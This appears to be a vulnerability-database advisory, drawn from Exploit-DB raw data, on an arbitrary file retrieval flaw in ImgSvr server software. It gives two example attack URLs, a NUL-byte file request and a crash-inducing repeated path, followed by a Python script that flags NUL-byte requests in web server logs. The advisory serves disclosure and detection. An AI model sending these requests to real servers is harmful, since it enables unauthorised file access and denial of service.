vendor: ImgSvr server software
by: Unknown
CVSS: 5.5 (MEDIUM)
Arbitrary File Retrieval
CWE: Unknown
Product Name: ImgSvr server software
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

ImgSvr server software Arbitrary File Retrieval Vulnerability

A vulnerability in the ImgSvr server software allows a remote user to retrieve arbitrary files from the web server root directory and its subdirectories. An attacker can gain access to arbitrary scripts within the server root directory.

Mitigation: Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10027/info

A vulnerability has been reported in the ImgSvr server software that may allow a remote user to retrieve arbitrary files from the web server root directory and any subdirectories therein.

An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory. 

http://www.example.org:1234/someDirectory/fileName%00

The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/
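
Both requests above carry a percent-encoded NUL byte (%00) in the URL path, which is something a defender can look for in web server access logs. The following is an added detection example, not part of the original advisory or of ImgSvr; it assumes Common Log Format, and the function names, the decode-round limit and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MAX_DECODE_ROUNDS = 3  # assumption: bound on nested percent-encoding we unwrap


def has_encoded_nul(target: str) -> bool:
    """True if the path part of a request target decodes to a NUL byte."""
    path = target.split("?", 1)[0]  # only the path is checked, not the query
    for _ in range(MAX_DECODE_ROUNDS):
        if "\x00" in path:
            return True
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:  # nothing left to decode
            return False
        path = decoded
    return "\x00" in path


def flag_nul_requests(log_lines):
    """Return (client, target) for each logged request whose path carries a NUL."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and has_encoded_nul(match.group("target")):
            hits.append((line.split(" ", 1)[0], match.group("target")))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2004:10:00:00 +0000] "GET /photos/index.html HTTP/1.0" 200 512',
    '192.0.2.44 - - [01/Apr/2004:10:00:05 +0000] "GET /someDirectory/fileName%00 HTTP/1.0" 200 2048',
    '192.0.2.44 - - [01/Apr/2004:10:00:09 +0000] "GET /%00/imgsvr.exe/imgsvr.exe/ HTTP/1.0" 500 0',
    '192.0.2.51 - - [01/Apr/2004:10:00:12 +0000] "GET /a/b%2500.jpg HTTP/1.0" 404 0',
    '192.0.2.10 - - [01/Apr/2004:10:00:20 +0000] "GET /gallery/100%25.jpg HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for client, target in flag_nul_requests(SAMPLE_LOG):
        print(f"{client} requested {target!r}")
```

The double-encoded form (%2500) is flagged as well, while a literal percent sign in a file name (%25) is not.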